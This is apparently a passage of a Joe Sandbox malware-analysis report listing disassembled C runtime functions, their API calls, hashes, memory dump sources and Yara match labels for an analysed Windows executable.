                                            • Opcode ID: 8364342a33e1f6661a6bce5336ba765543fa0960d464618dc439d72a20529d32
                                            • Instruction ID: a34b602a5d135cfd9f6470e1a6e2cd4d52c0270752290004bd760e0389dd2d70
                                            • Opcode Fuzzy Hash: 8364342a33e1f6661a6bce5336ba765543fa0960d464618dc439d72a20529d32
                                            • Instruction Fuzzy Hash: AB41F672B00510BBCB116FB99C42B9E37B9AF8C364F24151BF416E72B1DA3CD9514768
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetLastError.KERNEL32(?,?,?,0041A7CC,?,f!@,?,?,0041A887,?,f!@,?), ref: 00425CFE
                                            • _free.LIBCMT ref: 00425D5B
                                            • _free.LIBCMT ref: 00425D91
                                            • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,0041A887,?,f!@,?), ref: 00425D9C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast_free
                                            • String ID:
                                            • API String ID: 2283115069-0
                                            • Opcode ID: 94886a939363e5aafdd5e2de4b9380293d13e076148c1a5ad2d372cc562b468d
                                            • Instruction ID: 1c39bac3d6d59f3acbb9d9d96adc0eaff759205db5fa5e89b564f90778c45ebd
                                            • Opcode Fuzzy Hash: 94886a939363e5aafdd5e2de4b9380293d13e076148c1a5ad2d372cc562b468d
                                            • Instruction Fuzzy Hash: 2E11C6367109346BEA1027767C8DE2B2699DBC1B7DBE5423BF624C22E2DE7D8C01415C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929630304.0000000000448000.00000020.00020000.sdmp, Offset: 00448000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_448000_file.jbxd
                                            Similarity
                                            • API ID: __abstract_cw$___control87_sse2__hw_cw
                                            • String ID:
                                            • API String ID: 3606251187-0
                                            • Opcode ID: 21e5a4de1c9c4492427c1859670cc4865c80b52e1f401961d206ac67672534a1
                                            • Instruction ID: 6279c90b5396187b74596de2a687d4d336f7478526d914da44dc8a177037047b
                                            • Opcode Fuzzy Hash: 21e5a4de1c9c4492427c1859670cc4865c80b52e1f401961d206ac67672534a1
                                            • Instruction Fuzzy Hash: 0E218DB1D00109EFDB20DFA1D886AAEBBB1FF04304F11449AD8165B216DB349A60CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929630304.0000000000448000.00000020.00020000.sdmp, Offset: 00448000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_448000_file.jbxd
                                            Similarity
                                            • API ID: __abstract_cw$___control87_sse2__hw_cw
                                            • String ID:
                                            • API String ID: 3606251187-0
                                            • Opcode ID: c895c6aa48716006e6ab43ea85949847f5145d9c412a502c61110697ef77a3a7
                                            • Instruction ID: b60551110041ca6812d50555a666ec930fdac1823aa6fd107524c68c9358aeb0
                                            • Opcode Fuzzy Hash: c895c6aa48716006e6ab43ea85949847f5145d9c412a502c61110697ef77a3a7
                                            • Instruction Fuzzy Hash: ED217FB5E0010DEBEF04DF95D882AEEB7B5BF44301F10849AE815A7204E738EE40CB56
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,0042EEAF,00000000,00000001,00000000,00000000,?,0042717A,00000000,?,00000000), ref: 004313D9
                                            • GetLastError.KERNEL32(?,0042EEAF,00000000,00000001,00000000,00000000,?,0042717A,00000000,?,00000000,00000000,00000000,?,004276CE,?), ref: 004313E5
                                              • Part of subcall function 004313AB: CloseHandle.KERNEL32(FFFFFFFE,004313F5,?,0042EEAF,00000000,00000001,00000000,00000000,?,0042717A,00000000,?,00000000,00000000,00000000), ref: 004313BB
                                            • ___initconout.LIBCMT ref: 004313F5
                                              • Part of subcall function 0043136D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0043139C,0042EE9C,00000000,?,0042717A,00000000,?,00000000,00000000), ref: 00431380
                                            • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,0042EEAF,00000000,00000001,00000000,00000000,?,0042717A,00000000,?,00000000,00000000), ref: 0043140A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                            • String ID:
                                            • API String ID: 2744216297-0
                                            • Opcode ID: 8a122dc80a4656cc1f5ef104a01b190192e5d2ec304f358db94e81f76ea591d9
                                            • Instruction ID: c2d4d8bf00602c5290a3d0a1226214ac148d2f423b4f85e531053faa6dc93eb7
                                            • Opcode Fuzzy Hash: 8a122dc80a4656cc1f5ef104a01b190192e5d2ec304f358db94e81f76ea591d9
                                            • Instruction Fuzzy Hash: 01F0C036501524BBDF261FA5DC05D9A3F66FB0D3B5F555035FE2896131C6328820ABD8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • _free.LIBCMT ref: 00423D6B
                                              • Part of subcall function 00424BD8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?), ref: 00424BEE
                                              • Part of subcall function 00424BD8: GetLastError.KERNEL32(?,?,0042CAFB,?,00000000,?,?,?,0042CB22,?,00000007,?,?,0042CF52,?,?), ref: 00424C00
                                            • _free.LIBCMT ref: 00423D7E
                                            • _free.LIBCMT ref: 00423D8F
                                            • _free.LIBCMT ref: 00423DA0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _free$ErrorFreeHeapLast
                                            • String ID:
                                            • API String ID: 776569668-0
                                            • Opcode ID: 0eacfc734d2c43d416cff60cc544c206e25de6a074945f5097732c0b08f39dc9
                                            • Instruction ID: 85650dbc5ff5234b85e40e64ea43965e1665b56efa49b1ec533703476f555bad
                                            • Opcode Fuzzy Hash: 0eacfc734d2c43d416cff60cc544c206e25de6a074945f5097732c0b08f39dc9
                                            • Instruction Fuzzy Hash: CCE0867C401130FA8A222F21BC03A097E21E7B6F17393016BF41442331C73657619B8C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: r+@$vector<T> too long
                                            • API String ID: 0-3634607103
                                            • Opcode ID: 3c11e8be36af1e566edba1bf7d66869c852f1abf937243228d3330634d6e1631
                                            • Instruction ID: 5f9cba469d40273e6ec0acfff7f346d64c3ba8640895a30e293009e442d03abb
                                            • Opcode Fuzzy Hash: 3c11e8be36af1e566edba1bf7d66869c852f1abf937243228d3330634d6e1631
                                            • Instruction Fuzzy Hash: 705158B29002109BC724AF28DC40AABB7E5EF85314F14063FF855A7791D738E94987D9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 004021D5
                                              • Part of subcall function 00416307: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00416313
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Xinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                            • String ID: f!@$string too long
                                            • API String ID: 1997705970-1334407247
                                            • Opcode ID: 65de0f17033ae5e7fbcfb42e73b9f7c46c61be76540724522559fb5c4849dbf5
                                            • Instruction ID: 9d11292a31a92fdd549a9ab56056697053aeb21c499ce90459df23cdd6e9b045
                                            • Opcode Fuzzy Hash: 65de0f17033ae5e7fbcfb42e73b9f7c46c61be76540724522559fb5c4849dbf5
                                            • Instruction Fuzzy Hash: EE4137B16003044FC7249F74DAC866EB3A9AF85314B240A3FE852D77D1E7BDE8488769
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 004183F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EncodePointer
                                            • String ID: MOC$RCC
                                            • API String ID: 2118026453-2084237596
                                            • Opcode ID: d930d2330f3127baba7ea769631e6e483657b218a86f1fe839cc6047e2e7df05
                                            • Instruction ID: 16b447a73039b8e68cc3dd9bb5533b7a8677c9bf7377e19712ffa2ee5020701b
                                            • Opcode Fuzzy Hash: d930d2330f3127baba7ea769631e6e483657b218a86f1fe839cc6047e2e7df05
                                            • Instruction Fuzzy Hash: 62415B7290020AAFCF16DF98CD81AEEBBB5FF48304F15815EF91467211EB399990DB58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0042C65F: EnterCriticalSection.KERNEL32(00000000,?,00427582,00000000,00440D18,00000010,004252FA,00000000,?,?,?,?,?,00426B98,?,f!@), ref: 0042C67A
                                            • FlushFileBuffers.KERNEL32(00000000,00440ED8,0000000C,0042D7AE,WRB,?,00000001,?,00425257,?), ref: 0042D6F0
                                            • GetLastError.KERNEL32 ref: 0042D701
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BuffersCriticalEnterErrorFileFlushLastSection
                                            • String ID: WRB
                                            • API String ID: 4109680722-2263744077
                                            • Opcode ID: 665eba45340f9231d11835aba0f1a6f9c9ed3dce31b7ac4b1ae2e6ef1e596464
                                            • Instruction ID: c1aa163a20503948efc7cc34811fe0dff4b120f0576b7117c8c4efa99648f7df
                                            • Opcode Fuzzy Hash: 665eba45340f9231d11835aba0f1a6f9c9ed3dce31b7ac4b1ae2e6ef1e596464
                                            • Instruction Fuzzy Hash: 700180B6B002249FC704AFA9E94565D7BB4EF49724F50422FF411DB3E1DB7C98418B98
                                            Uniqueness

                                            Uniqueness Score: -1.00%